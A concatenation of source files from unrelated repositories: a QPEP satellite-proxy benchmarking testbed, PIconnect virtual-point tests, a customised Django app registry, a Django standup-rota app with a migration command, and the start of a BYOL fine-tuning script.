matches = matches[:-1] # the last match is the average load time, which we don't want mixing up our stats
for match in matches:
# if the connection measures in milliseconds we take as is, otherwise convert
if match[1] == 'm':
host_val = float(match[0])
elif match[1] == 's':
host_val = float(match[0]) * 1000
if host not in self.results.keys():
self.results[host] = [host_val]
else:
self.results[host].append(host_val)
print(host_result)
if len(matches) == 0:
logger.warning("No browsertime measurement for " + str(host_string))
else:
logger.debug("Browsertime: " + str(host_string) + " " + str(match[0]) + str(match[1]))
#count failed connections for host
error_matches = re.findall('UrlLoadError', str(host_result))
self.errors = self.errors + len(error_matches)
logger.debug("Browsertime Error Count: " + str(len(error_matches)) + " " + host)
print("Interim Results: ","(", self.name,")", self.results)
if i != self.iterations - 1:
self.scenario.deploy_scenario()
def print_results(self):
print(self.results)
#print("Mean page load time: ", mean(self.results))
#print("Load time measurements: ", self.results)
print("Failed load count: ", self.errors)
def save_results_to_db(self, scenario_name, testbed_name):
data ={}
now = datetime.now()
docker_client = docker.from_env()
terminal_workstation = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
try:
exit_code, output = terminal_workstation.exec_run("ping -c 1 google.ch")
except:
logger.warning("Ping measurement failed")
try:
string = output.decode()
ping = re.findall("time=([0-9]+)", string)[0]
except:
logger.warning("Could not parse ping output. ")
ping = "9999"
logger.debug("Ping: "+ping)
data.update({
"date": now,
"testbed": testbed_name,
"scenario": scenario_name,
"ping": int(ping),
"measurements": self.make_keys_mongoDB_compatible(self.results)
})
logger.debug(data)
if data["measurements"] != {}:
self.push_to_db("sitespeed",data)
if __name__ == "__main__":
benchmark = SitespeedBenchmark()
benchmark.save_results_to_db("test","realworld")
```
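Besides the `__main__` block above, the benchmark classes can be driven directly; a hedged sketch is below. It assumes the client and gateway containers named in the `.env` files are running and reachable, and the file sizes are arbitrary examples.
```python
# Hypothetical standalone run of the TCP iperf benchmark defined above.
from benchmarks import IperfBenchmark

benchmark = IperfBenchmark(
    file_sizes=[1_000_000, 10_000_000],  # 1 MB and 10 MB transfers
    bw_limit="8000M",
    iterations=3,
)
benchmark.run()
benchmark.print_results()
# benchmark.save_results_to_db("plain", "realworld")  # optionally push results to MongoDB
```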
#### File: qpep/realworld-testbed/scenarios.py
```python
from abc import ABC, abstractmethod
from loguru import logger
import docker
import time
import os
from dotenv import load_dotenv
load_dotenv()
load_dotenv(str(os.getenv("SERVER_ENV")))
load_dotenv(str(os.getenv("CLIENT_ENV")))
class Scenario(ABC):
def __init__(self, name, testbed, benchmarks):
self.name = name
self.testbed = testbed
self.benchmarks = benchmarks
@abstractmethod
def deploy_scenario(self):
self.testbed.start_testbed()
def run_benchmarks(self, deployed=False):
for benchmark in self.benchmarks:
if not deployed:
self.deploy_scenario()
benchmark.run()
def print_results(self):
print("*"*25)
print("Benchmark Results for ", self.name)
print("*"*25)
for benchmark in self.benchmarks:
print("****", benchmark.name, "****")
benchmark.print_results()
class PlainScenario(Scenario):
def deploy_scenario(self, testbed_up=False):
if not testbed_up:
super().deploy_scenario()
docker_client = docker.from_env()
terminal_workstation = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
logger.debug("Configuring proxy on Terminal WS")
terminal_workstation.exec_run("export http_proxy=http://"+os.getenv("PROXY_SRV_URL")+":5001")
terminal_workstation.exec_run("export https_proxy=https://"+os.getenv("PROXY_SRV_URL")+":5001")
class OpenVPNScenario(Scenario):
def deploy_scenario(self, testbed_up=False):
if not testbed_up:
super().deploy_scenario()
docker_client = docker.from_env()
terminal_workstation = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
# Satellite latency means that it takes OpenVPN a long time to establish the connection, waiting is easiest
logger.debug("Launching OVPN and waiting...remote "+str(os.getenv("WS_OVPN_URL"))+" "+str(os.getenv("WS_OVPN_PORT")))
terminal_workstation.exec_run("openvpn --remote "+str(os.getenv("WS_OVPN_URL"))+" "+str(os.getenv("WS_OVPN_PORT"))+" udp --config /root/client.ovpn --daemon")
time.sleep(20)
class OpenVPNTCPScenario(Scenario):
def deploy_scenario(self, testbed_up=False):
if not testbed_up:
super().deploy_scenario()
docker_client = docker.from_env()
terminal_workstation = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
# Satellite latency means that it takes OpenVPN a long time to establish the connection, waiting is easiest
logger.debug("Launching OVPN and waiting...remote "+str(os.getenv("WS_OVPN_URL"))+" "+str(os.getenv("WS_OVPN_PORT")))
terminal_workstation.exec_run("openvpn --remote "+str(os.getenv("WS_OVPN_URL"))+" "+str(os.getenv("WS_OVPN_PORT"))+" tcp --config /root/client.ovpn --daemon")
time.sleep(20)
class QPEPScenario(Scenario):
def __init__(self, name, testbed, benchmarks, multi_stream=True):
self.multi_stream = multi_stream
super().__init__(name, testbed, benchmarks)
def deploy_scenario(self, testbed_up=False):
if not testbed_up:
super().deploy_scenario()
docker_client = docker.from_env()
logger.debug("Configuring Client Side of QPEP Proxy")
terminal_container = docker_client.containers.get(os.getenv("ST_CONTAINER_NAME"))
terminal_container.exec_run("bash ./tmp/config/configure_qpep.sh")
logger.debug("Configuring Gateway Side of QPEP Proxy")
docker_client_cloud = docker.DockerClient(base_url="ssh://"+os.getenv("DOCKER_REMOTE_URL"))
gateway_workstation = docker_client_cloud.containers.get(os.getenv('WS_GW_CONTAINER_NAME'))
if testbed_up:
# kill running QPEP services for fresh start
gateway_workstation.exec_run("pkill -9 main")
terminal_container.exec_run("pkill -9 main")
logger.debug("Launching QPEP Client")
terminal_container.exec_run("go run /root/go/src/qpep/main.go -client -gateway "+os.getenv("QPEP_SRV_URL")+" -port "+os.getenv("QPEP_SRV_PORT"), detach=True)
logger.debug("Launching QPEP Gateway")
gateway_workstation.exec_run("go run /root/go/src/qpep/main.go -port "+os.getenv("QPEP_SRV_PORT"), detach=True)
logger.success("QPEP Running")
class QPEPAckScenario(Scenario):
def deploy_scenario(self, testbed_up=False, ack_level=4):
if not testbed_up:
super().deploy_scenario()
docker_client = docker.from_env()
terminal_container = docker_client.containers.get(os.getenv("ST_CONTAINER_NAME"))
gateway_workstation = docker_client.containers.get(os.getenv("WS_GW_CONTAINER_NAME"))
if testbed_up:
logger.debug("Killing any prior QPEP")
terminal_container.exec_run("pkill -9 main")
gateway_workstation.exec_run("pkill -9 main")
time.sleep(1)
else:
logger.debug("Configuring Client Side of QPEP Proxy")
terminal_container.exec_run("bash /opensand_config/configure_qpep.sh")
logger.debug("Configuring Gateway Side of QPEP Proxy")
gateway_workstation.exec_run("bash /opensand_config/configure_qpep.sh")
logger.debug("Launching QPEP Client")
terminal_container.exec_run("go run /root/go/src/qpep/main.go -client -minBeforeDecimation 2 -ackDelay 8000 -varAckDelay 16.0 -gateway " + str(os.getenv("GW_NETWORK_HEAD")) + ".0.9 -acks " + str(ack_level), detach=True)
logger.debug("Launching QPEP Gateway")
gateway_workstation.exec_run("go run /root/go/src/qpep/main.go -minBeforeDecimation 2 -ackDelay 8000 -varAckDelay 16.0", detach=True)
logger.success("QPEP Running")
class QPEPCongestionScenario(Scenario):
def deploy_scenario(self, testbed_up=False, congestion_window=10):
if not testbed_up:
super().deploy_scenario()
docker_client = docker.from_env()
terminal_container = docker_client.containers.get(os.getenv("ST_CONTAINER_NAME"))
gateway_workstation = docker_client.containers.get(os.getenv("WS_GW_CONTAINER_NAME"))
if testbed_up:
logger.debug("Killing any prior QPEP")
terminal_container.exec_run("pkill -9 main")
gateway_workstation.exec_run("pkill -9 main")
time.sleep(1)
else:
logger.debug("Configuring Client Side of QPEP Proxy")
terminal_container.exec_run("bash /opensand_config/configure_qpep.sh")
logger.debug("Configuring Gateway Side of QPEP Proxy")
gateway_workstation.exec_run("bash /opensand_config/configure_qpep.sh")
logger.debug("Launching QPEP Client")
terminal_container.exec_run("go run /root/go/src/qpep/main.go -client -gateway " + str(os.getenv("GW_NETWORK_HEAD")) +".0.9 -congestion " + str(congestion_window), detach=True)
logger.debug("Launching QPEP Gateway")
gateway_workstation.exec_run("go run /root/go/src/qpep/main.go -congestion " + str(congestion_window), detach=True)
logger.success("QPEP Running")
class PEPsalScenario(Scenario):
def __init__(self, name, testbed, benchmarks, terminal=True, gateway=False):
self.terminal = terminal
self.gateway = gateway
super().__init__(name=name, testbed=testbed, benchmarks=benchmarks)
def deploy_scenario(self, testbed_up=False):
if not testbed_up:
super().deploy_scenario()
logger.debug("Starting PEPsal Scenario")
docker_client = docker.from_env()
terminal_workstation = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
terminal_client = docker_client.containers.get(os.getenv("ST_CONTAINER_NAME"))
logger.debug("Configuring proxy on Terminal WS")
terminal_workstation.exec_run("export http_proxy=http://"+os.getenv("PROXY_SRV_URL")+":5001")
terminal_workstation.exec_run("export https_proxy=https://"+os.getenv("PROXY_SRV_URL")+":5001")
if self.terminal and self.gateway:
logger.debug("Deploying PEPsal in Distributed Mode")
if self.terminal:
logger.debug("Deploying PEPsal on Terminal Endpoint")
terminal_client.exec_run("bash ./tmp/config/launch_pepsal.sh")
if self.gateway:
logger.debug("Deploying PEPsal on Gateway Endpoint")
docker_client_cloud = docker.DockerClient(base_url="ssh://"+os.getenv("DOCKER_REMOTE_URL"))
gateway_workstation = docker_client_cloud.containers.get(os.getenv('WS_GW_CONTAINER_NAME'))
gateway_workstation.exec_run("bash ./tmp/launch_pepsal.sh")
```
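The scenarios above are meant to be combined with a testbed and a list of benchmarks; a hedged composition sketch follows. `RealWorldTestbed` is defined in the `testbeds.py` file shown next, and the parameters are illustrative only.
```python
# Hypothetical end-to-end run: testbed + benchmark + scenario.
from testbeds import RealWorldTestbed
from benchmarks import IperfBenchmark
from scenarios import QPEPScenario

testbed = RealWorldTestbed()
benchmarks = [IperfBenchmark(file_sizes=[5_000_000], iterations=1)]
scenario = QPEPScenario(name="QPEP", testbed=testbed, benchmarks=benchmarks)

scenario.run_benchmarks()   # deploys the scenario, then runs each benchmark
scenario.print_results()
for benchmark in benchmarks:
    benchmark.save_results_to_db(scenario.name, "realworld")
```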
#### File: qpep/realworld-testbed/testbeds.py
```python
import subprocess
import os
from loguru import logger
import docker
import xml.etree.ElementTree as ET
from dotenv import load_dotenv
load_dotenv()
class RealWorldTestbed(object):
def start_testbed(self):
# First, shut down any old running testbeds
logger.debug("Shutting Down Previous Testbed: local")
subprocess.call(["/usr/local/bin/docker-compose", "-f", os.getenv("COMPOSE_CLIENT") ,"down"], stderr=subprocess.DEVNULL)
logger.debug("Shutting Down Previous Testbeds: remote")
subprocess.call(["ssh", os.getenv("DOCKER_REMOTE_URL"), "/usr/local/bin/docker-compose", "-f", os.getenv("COMPOSE_SERVER") ,"down"], stderr=subprocess.DEVNULL)
logger.debug("Starting local Testbed Containers")
# Start the docker containers
subprocess.call(["/usr/local/bin/docker-compose", "-f", os.getenv("COMPOSE_CLIENT") , "up", "-d"])
logger.debug("Starting remote Testbed Containers")
subprocess.call(["ssh", os.getenv("DOCKER_REMOTE_URL"), "/usr/local/bin/docker-compose", "-f", os.getenv("COMPOSE_SERVER") , "up", "-d"])
logger.success("Real-world Testbed Running")
def stop_testbed(self):
logger.debug("Shutting Down Testbed: local")
subprocess.call(["/usr/local/bin/docker-compose", "-f", os.getenv("COMPOSE_CLIENT") ,"down"], stderr=subprocess.DEVNULL)
logger.debug("Shutting Down Testbeds: remote")
subprocess.call(["ssh", os.getenv("DOCKER_REMOTE_URL"), "/usr/local/bin/docker-compose", "-f", os.getenv("COMPOSE_SERVER") ,"down"], stderr=subprocess.DEVNULL)
if __name__ == '__main__':
#subprocess.call(["docker-compose", "-f", os.getenv("COMPOSE_SERVER") ,"down"], stderr=subprocess.DEVNULL)
#subprocess.call(["docker-compose", "-f", os.getenv("COMPOSE_SERVER"), "-c", "cloud" ,"up"], stderr=subprocess.DEVNULL)
docker_client_cloud = docker.DockerClient(base_url="ssh://"+os.getenv("DOCKER_REMOTE_URL"))
``` |
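The real-world testbed reaches the cloud gateway through Docker's SSH transport (`base_url="ssh://..."`), the same mechanism used in `benchmarks.py`. A minimal sketch of that connection is below; the hostname is a placeholder and an SSH key or agent must already grant access to the remote host.
```python
import docker

# Connect to a remote Docker engine over SSH, as the benchmarks do for the
# cloud gateway. "user@gateway.example.com" is a placeholder host.
remote = docker.DockerClient(base_url="ssh://user@gateway.example.com")
for container in remote.containers.list():
    print(container.name, container.status)
```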
{
"source": "jhvanderven/PIconnect",
"score": 3
} |
#### File: PIconnect/test/test_VirtualPIPoint_calculus.py
```python
from __future__ import (absolute_import, division,
print_function, unicode_literals)
from builtins import (bytes, dict, int, list, object, range, str,
ascii, chr, hex, input, next, oct, open,
pow, round, super,
filter, map, zip)
# pragma pylint: enable=unused-import
import PIconnect as PI
from PIconnect.test.fakes import VirtualTestCase
class TestVirtualAddition(VirtualTestCase):
"""Test VirtualPIPoint addition."""
def test_add_integer_current_value(self):
"""Test adding an integer to a PIPoint via the current value."""
point2 = self.point + 1
self.assertAlmostEqual(point2.current_value, self.values[-1] + 1)
def test_add_integer_reverse_current_value(self):
"""Test adding a PIPoint to an integer via the current value."""
point2 = 1 + self.point
self.assertAlmostEqual(point2.current_value, self.values[-1] + 1)
def test_add_pipoints_current_value(self):
"""Test adding two PIPoints via the current value."""
total = self.point + self.point
self.assertAlmostEqual(total.current_value,
self.values[-1] + self.values[-1])
class TestVirtualMultiplication(VirtualTestCase):
"""Test VirtualPIPoint addition."""
def test_multiply_integer_current_value(self):
"""Test adding an integer to a PIPoint via the current value."""
point2 = self.point * 1
self.assertAlmostEqual(point2.current_value, self.values[-1] * 1)
def test_multiply_integer_reverse_current_value(self):
"""Test adding a PIPoint to an integer via the current value."""
point2 = 1 * self.point
self.assertAlmostEqual(point2.current_value, self.values[-1] * 1)
def test_multiply_pipoints_current_value(self):
"""Test adding two PIPoints via the current value."""
total = self.point * self.point
self.assertAlmostEqual(total.current_value,
self.values[-1] * self.values[-1])
def test_multiply_integer_two_current_value(self):
"""Test adding an integer to a PIPoint via the current value."""
point2 = self.point * 2
self.assertAlmostEqual(point2.current_value, self.values[-1] * 2)
def test_multiply_integer_two_reverse_current_value(self):
"""Test adding a PIPoint to an integer via the current value."""
point2 = 2 * self.point
self.assertAlmostEqual(point2.current_value, self.values[-1] * 2)
def test_multiply_float_two_current_value(self):
"""Test adding an integer to a PIPoint via the current value."""
point2 = self.point * 2.0
self.assertAlmostEqual(point2.current_value, self.values[-1] * 2.0)
def test_multiply_float_two_reverse_current_value(self):
"""Test adding a PIPoint to an integer via the current value."""
point2 = 2.0 * self.point
self.assertAlmostEqual(point2.current_value, self.values[-1] * 2.0)
``` |
{
"source": "Jhvcc/CustomizeDjango",
"score": 2
} |
#### File: django/apps/registry.py
```python
import functools
import sys
import threading
from collections import defaultdict, Counter
from django.apps.config import AppConfig
from django.core.exceptions import ImproperlyConfigured, AppRegistryNotReady
class Apps:
"""
注册settings INSTALLED_APPS的应用
"""
def __init__(self, installed_apps=()):
if installed_apps is None and hasattr(sys.modules[__name__], "apps"):
raise RuntimeError("You must supply an installed_apps argument.")
# Mapping of app labels => model names => model classes. Every time a
# model is imported, ModelBase.__new__ calls apps.register_model which
# creates an entry in all_models. All imported models are registered,
# regardless of whether they're defined in an installed application
# and whether the registry has been populated. Since it isn't possible
# to reimport a module safely (it could reexecute initialization code)
# all_models is never overridden or reset.
self.all_models = defaultdict(dict)
        # Maps app labels to AppConfig instances for the installed applications.
self.app_configs = {}
        # Stack of app_configs. set_available_apps() and set_installed_apps() use it to save the current state.
self.stored_app_configs = []
        # Whether the registry has been populated.
self.apps_ready = self.models_ready = self.ready = False
        # Used for autoreloading.
self.ready_event = threading.Event()
        # Lock for thread safety.
self._lock = threading.RLock()
self.loading = False
# Maps ("app_label", "modelname") tuples to lists of functions to be
# called when the corresponding model is ready. Used by this class's
# `lazy_model_operation()` and `do_pending_operations()` methods.
self._pending_operations = defaultdict(list)
if installed_apps is not None:
self.populate(installed_apps)
def populate(self, installed_apps=None):
"""
加载配置和模型
导入每个应用模块以及相应的模型
这是线程安全且幂等的, 但不可重入
"""
if self.ready:
return
        # On servers that create threads before initializing the WSGI callable,
        # two threads may execute populate() in parallel, so a lock is needed.
with self._lock:
if self.ready:
return
            # The lock prevents other threads from entering this section; the operations below are atomic.
            if self.loading:
                # Prevent repeated calls so that AppConfig.ready() isn't run twice.
                raise RuntimeError("populate() isn't reentrant")
self.loading = True
            # Phase 1: initialize app configs and import app modules.
for entry in installed_apps:
if isinstance(entry, AppConfig):
app_config = entry
else:
app_config = AppConfig.create(entry)
if app_config.label in self.app_configs:
raise ImproperlyConfigured(
"Application labels aren't unique, "
"duplicates: %s" % app_config.label
)
self.app_configs[app_config.label] = app_config
app_config.apps = self
            # Check for duplicate app names.
counts = Counter(
app_config.name for app_config in self.app_configs.values()
)
duplicates = [name for name, count in counts.most_common() if count > 1]
if duplicates:
raise ImproperlyConfigured(
"Application names aren't unique, "
"duplicates: %s" % ", ".join(duplicates)
)
self.apps_ready = True
            # Phase 2: import models modules.
for app_config in self.app_configs.values():
app_config.import_models()
self.clear_cache()
self.models_ready = True
            # Phase 3: run ready() methods of app configs.
for app_config in self.get_app_configs():
app_config.ready()
self.ready = True
self.ready_event.set()
    # This method is performance-critical, at least as far as Django's test suite is concerned.
    @functools.lru_cache(maxsize=None)
    def get_models(self, include_auto_created=False, include_swapped=False):
        """
        Return a list of all models across all applications in INSTALLED_APPS.
        By default the following aren't included:
        - auto-created models for many-to-many relations without an explicit intermediate table
        - models that have been swapped out
        """
self.check_models_ready()
def get_app_configs(self):
"""导入应用并返回app配置迭代器"""
self.check_apps_ready()
return self.app_configs.values()
def check_apps_ready(self):
"""如果所有的模型还没有被导入就报错"""
if not self.apps_ready:
from django.conf import settings
settings.INSTALLED_APPS
raise AppRegistryNotReady("Apps aren't loaded yet.")
def check_models_ready(self):
        """Raise an exception if all models haven't been imported yet."""
        if not self.models_ready:
            raise AppRegistryNotReady("Models aren't loaded yet.")
def clear_cache(self):
"""
清除所有的内部缓存, 修改app注册的时候使用
经常在test中使用
"""
# 调用每个模型的过期缓存. 会清除所有的关系树和字段缓存
self.get_models.cache_clear()
apps = Apps(installed_apps=None)
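# Illustrative usage sketch (editorial comment, not part of this file): in a full Django
# project the singleton above is driven by django.setup(), which roughly does
#     from django.conf import settings
#     apps.populate(settings.INSTALLED_APPS)
# after which get_app_configs() and get_models() become safe to call.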
```
#### File: django/utils/module_loading.py
```python
import sys
from importlib import import_module
from importlib.util import find_spec as importlib_find
def cached_import(module_path, class_name):
if not (
(module := sys.modules.get(module_path))
and (spec := getattr(module, "__spec__", None))
and getattr(spec, "_initializing", False) is False
):
module = import_module(module_path)
return getattr(module, class_name)
def import_string(dotted_path):
"""
通过字符串导入模块
"""
try:
module_path, class_name = dotted_path.rsplit(".", 1)
except ValueError as err:
raise ImportError("%s doesn't look like a module path" % dotted_path) from err
try:
return cached_import(module_path, class_name)
except AttributeError as err:
raise ImportError(
'Module "%s" does not define a "%s" attribute/class'
% (module_path, class_name)
) from err
def module_has_submodule(package, module_name):
try:
package_name = package.__name__
package_path = package.__path__
except AttributeError:
return False
full_module_name = package_name + "." + module_name
try:
return importlib_find(full_module_name, package_path) is not None
except ModuleNotFoundError:
return False
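# Illustrative usage sketch (editorial comment, not part of Django): import_string resolves
# a dotted path to an attribute, e.g.
#     import_string("collections.OrderedDict")   # returns the OrderedDict class
#     import_string("collections")               # raises ImportError (no attribute part)
#     import_string("no.such.module.Thing")      # raises ImportError from the failed import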
``` |
{
"source": "jhvhs/standup-pivots",
"score": 2
} |
#### File: management/commands/migratefromdublinstandup.py
```python
from django.core.management import BaseCommand, CommandError
from django.db import connection
class Command(BaseCommand):
help = "Migrate data from the app using the old name `dublinstandup` in postgres"
def __init__(self, stdout=None, stderr=None, no_color=False):
super().__init__(stdout, stderr, no_color)
self._cursor = connection.cursor()
@property
def cursor(self):
return self._cursor
def handle(self, *args, **options):
try:
self.migrate()
except RuntimeError as err:
raise CommandError("Unable to move the data\n{0}".format(err))
def migrate(self):
with self.cursor:
if self.is_data_present("standup_pivot"):
raise RuntimeError("Cowardly refusing to migrate - data exists in target tables")
if self.does_table_exist('dublinstandup_pivot'):
self.stdout.write("Migrating data from the pivot table")
self.migrate_pivots()
else:
raise RuntimeError("Unable to find `dublinstandup` app tables")
if self.does_table_exist('dublinstandup_schedule'):
self.stdout.write("Migrating data from the schedule table")
self.migrate_schedule()
elif self.does_table_exist('dublinstandup_standup'):
self.stdout.write("Migrating data from the standup table")
self.migrate_standup()
else:
raise RuntimeError("Unable to find `dublinstandup` app tables")
def does_table_exist(self, table_name):
self.stdout.write("Checking for presence of the `{0}` table".format(table_name))
self.cursor.execute("select count(*) from information_schema.tables where table_name like %s", (table_name,))
row = self.cursor.fetchone()
return (row is not None) and (row[0] == 1)
def does_column_exist(self, table_name, column_name):
self.stdout.write("Checking for presence of {0}.{1}".format(table_name, column_name))
self.cursor.execute(
"select count(*) from information_schema.columns where table_name like %s and column_name like %s",
            (table_name, column_name))
        row = self.cursor.fetchone()
        return (row is not None) and (row[0] == 1)
def is_data_present(self, table_name):
self.cursor.execute("select count(*) from {0}".format(table_name))
row = self.cursor.fetchone()
return row[0] > 0
def migrate_pivots(self):
if self.does_column_exist("dublinstandup_pivots", "has_left_the_office"):
self.cursor.execute("insert into standup_pivot select * from dublinstandup_pivot")
else:
self.cursor.execute("""insert into standup_pivot(id, full_name, email, slack_handle, has_left_the_office)
select id, full_name, email, slack_handle, false from dublinstandup_pivot""")
self.stdout.write("{0} row(s) moved".format(self.cursor.rowcount))
def migrate_schedule(self):
self.cursor.execute("insert into standup_standup select * from dublinstandup_schedule")
self.stdout.write("{0} row(s) moved".format(self.cursor.rowcount))
def migrate_standup(self):
self.cursor.execute("insert into standup_standup select * from dublinstandup_standup")
self.stdout.write("{0} row(s) moved".format(self.cursor.rowcount))
```
#### File: standup-pivots/standup/models.py
```python
from datetime import date, timedelta
from random import choice
from django.core.validators import EmailValidator
from django.db import models
from django.db.models import Max
from .validators import validate_monday
class Pivot(models.Model):
full_name = models.CharField(max_length=255)
email = models.CharField(max_length=255, validators=(EmailValidator(),))
slack_handle = models.CharField(max_length=255)
has_left_the_office = models.BooleanField(default=False)
def __str__(self):
return self.full_name
@property
def first_name(self):
return self.full_name.split(' ')[0]
@classmethod
def available(cls):
return cls.objects.filter(has_left_the_office=False)
@classmethod
def next_pivot_for_standup(cls):
new_pivot = cls.new_pivot_for_standup()
if new_pivot:
return new_pivot
return Pivot()
@classmethod
def new_pivot_for_standup(cls, excluded=None):
new_pivots = cls.available().filter(as_first_pivot__isnull=True, as_second_pivot__isnull=True)
if excluded is not None:
new_pivots = new_pivots.exclude(id=excluded.id)
if new_pivots.count() == 0:
new_pivots = cls._get_random_pivots()
new_id = choice(new_pivots.values_list('id', flat=True))
return cls.objects.get(pk=new_id)
@classmethod
def _get_random_pivots(cls):
skip_weeks = cls.available().count() / 5
skipped_pivots = cls._ids_for_pivots_running_standups_over_last_weeks(skip_weeks)
return cls.available().exclude(pk__in=skipped_pivots)
@classmethod
def _ids_for_pivots_running_standups_over_last_weeks(cls, number_of_weeks):
last_scheduled_standup = Standup.objects.aggregate(Max("week_start"))['week_start__max']
skip_upto_date = last_scheduled_standup - timedelta(weeks=number_of_weeks - 1)
recent_first_pivots = Pivot.objects.annotate(f=Max('as_first_pivot__week_start')).filter(f__gt=skip_upto_date)
recent_second_pivots = Pivot.objects.annotate(s=Max('as_second_pivot__week_start')).filter(s__gt=skip_upto_date)
return (recent_first_pivots | recent_second_pivots).distinct().values_list('id', flat=True)
class Standup(models.Model):
week_start = models.DateField(unique=True, validators=(validate_monday,))
first_pivot = models.ForeignKey('Pivot', on_delete=models.SET_NULL, related_name="as_first_pivot", null=True)
second_pivot = models.ForeignKey('Pivot', on_delete=models.SET_NULL, related_name="as_second_pivot", null=True)
def __str__(self):
return "Week of %s" % self.week_start
class Meta:
ordering = ('week_start',)
@classmethod
    def current_standup(cls, weekday_index=None):
        # Avoid evaluating date.today() at class-definition time (a default-argument pitfall).
        if weekday_index is None:
            weekday_index = date.today().weekday()
        qs = cls._get_current_standup(weekday_index)
if qs.count() == 0:
cls.plan(4)
qs = cls._get_current_standup(weekday_index)
return qs.first()
@classmethod
def _get_current_standup(cls, weekday_index):
if weekday_index < 5:
qs = cls.objects.filter(week_start__lte=date.today()).order_by('-week_start')
else:
qs = cls.objects.filter(week_start__gt=date.today())
return qs
@classmethod
def next_standup(cls):
return cls.current_standup(6)
@property
def following_standup(self):
return self.__class__.objects.filter(week_start__gt=self.week_start).first()
@classmethod
def plan(cls, week_count):
last_date = cls.objects.aggregate(Max("week_start"))['week_start__max']
        last_date = max(last_date, _last_monday()) if last_date else _last_monday()
for i in range(week_count):
offset = timedelta(weeks=i + 1)
first_pivot = Pivot.new_pivot_for_standup()
second_pivot = Pivot.new_pivot_for_standup(excluded=first_pivot)
cls(week_start=last_date + offset, first_pivot=first_pivot, second_pivot=second_pivot).save()
def _this_monday():
current_weekday = date.today().weekday()
return date.today() - timedelta(current_weekday)
def _last_monday():
return _this_monday() - timedelta(7)
```
#### File: standup-pivots/standup/validators.py
```python
from django.core.exceptions import ValidationError
from django.utils.translation import ugettext_lazy as _
def validate_monday(d):
if d.weekday() != 0:
raise ValidationError(_("%s is supposed to be a Monday" % d))
```
#### File: standup-pivots/standup/views.py
```python
from django.http import HttpResponse
from django.template.response import SimpleTemplateResponse
from .models import Standup
from standup_pivots.settings import SITE_TITLE
SLACK_MESSAGE = "The standup hosts for the next week are <@{}> and <@{}>"
def index(request):
current_standup = Standup.current_standup()
return SimpleTemplateResponse('index.html', {
'standup': current_standup,
'following_standup': current_standup.following_standup,
'title': SITE_TITLE,
})
def slack_notification(request):
standup = Standup.next_standup()
return HttpResponse(SLACK_MESSAGE.format(standup.first_pivot.slack_handle, standup.second_pivot.slack_handle))
``` |
{
"source": "jhvics1/pytorch-byol",
"score": 2
} |
#### File: jhvics1/pytorch-byol/byol_finetune.py
```python
import os
import random
import argparse
import multiprocessing
import numpy as np
import torch
import torch.nn as nn
import torch.utils.data as data
from torchvision import models, transforms
import torchvision.datasets as datasets
from utils import Bar, config, mkdir_p, AverageMeter, accuracy
from datetime import datetime
from tensorboardX import SummaryWriter
def train(model, criterion, opt, softmax, bar, epoch, loader, losses, top1, top5, writer):
# for training
model.train()
for batch_idx, (inputs, labels) in enumerate(loader):
outputs = model(inputs.cuda())
outputs = softmax(outputs)
loss = criterion(outputs, labels.cuda())
# measure accuracy and record loss
prec1, prec5 = accuracy(outputs.data, labels.cuda().data, topk=(1, 5))
losses.update(loss.data.item(), inputs.size(0))
top1.update(prec1.item(), inputs.size(0))
top5.update(prec5.item(), inputs.size(0))
opt.zero_grad()
loss.backward()
opt.step()
# plot progress
bar.suffix = 'Epoch {epoch} - Total: {total:} | ETA: {eta:} | Loss: {loss:.4f} | top1: {top1: .4f} | top5: {top5: .4f} | ({batch}/{size})'.format(
epoch=epoch,
batch=batch_idx + 1,
size=len(loader),
total=bar.elapsed_td,
eta=bar.eta_td,
loss=loss.item(),
top1=top1.avg,
top5=top5.avg,
)
n_iter = epoch * len(loader) + batch_idx + 1
writer.add_scalar('Train/loss', loss.data.item(), n_iter)
writer.add_scalar('Train/top1', prec1.data.item(), n_iter)
writer.add_scalar('Train/top5', prec5.data.item(), n_iter)
bar.next()
writer.add_scalar('Avg.loss', losses.avg, epoch)
writer.add_scalar('Avg.top1', top1.avg, epoch)
writer.add_scalar('Avg.top5', top5.avg, epoch)
bar.finish()
def test(model, criterion, softmax, bar, epoch, loader, losses, top1, top5, writer):
model.eval()
for batch_idx, (inputs, labels) in enumerate(loader):
outputs = model(inputs.cuda())
outputs = softmax(outputs)
loss = criterion(outputs, labels.cuda())
# measure accuracy and record loss
prec1, prec5 = accuracy(outputs.data, labels.cuda().data, topk=(1, 5))
losses.update(loss.data.item(), inputs.size(0))
top1.update(prec1.item(), inputs.size(0))
top5.update(prec5.item(), inputs.size(0))
# plot progress
bar.suffix = 'Epoch {epoch} - Total: {total:} | ETA: {eta:} | Loss: {loss:.4f} | top1: {top1: .4f} | top5: {top5: .4f} | ({batch}/{size})'.format(
epoch=epoch,
batch=batch_idx + 1,
size=len(loader),
total=bar.elapsed_td,
eta=bar.eta_td,
loss=loss.item(),
top1=top1.avg,
top5=top5.avg,
)
n_iter = epoch * len(loader) + batch_idx + 1
writer.add_scalar('Test/loss', loss.data.item(), n_iter)
writer.add_scalar('Test/top1', prec1.data.item(), n_iter)
writer.add_scalar('Test/top5', prec5.data.item(), n_iter)
bar.next()
writer.add_scalar('Avg.loss', losses.avg, epoch)
writer.add_scalar('Avg.top1', top1.avg, epoch)
writer.add_scalar('Avg.top5', top5.avg, epoch)
bar.finish()
def main():
    global parser, args
# arguments
parser = argparse.ArgumentParser(description='byol-lightning-test')
# Architecture & hyper-parameter
parser.add_argument('--arch', '-a', metavar='ARCH', default='resnet',
help='model architecture: | [resnet, ...] (default: resnet18)')
parser.add_argument('--depth', type=int, default=18, help='Model depth.')
parser.add_argument('-c', '--checkpoint', default='../checkpoints', type=str, metavar='PATH',
help='path to save checkpoint (default: checkpoint)')
parser.add_argument('--epoch', type=int, default=100, help='Epoch')
    parser.add_argument('--batch-size', type=int, default=32, help='Batch size')
    parser.add_argument('--lr', '--learning-rate', default=1, type=float,
                        metavar='LR', help='initial learning rate')
    parser.add_argument('--num-classes', type=int, default=100, help='Number of classes')
    parser.add_argument('--from-scratch', action='store_true', default=False,
                        help='train from scratch (do not load a BYOL pre-trained checkpoint)')
    parser.add_argument('--tune-all', action='store_true', default=False,
                        help='fine-tune all layers instead of only the final classifier')
# Device options
parser.add_argument('--manualSeed', type=int, help='manual seed')
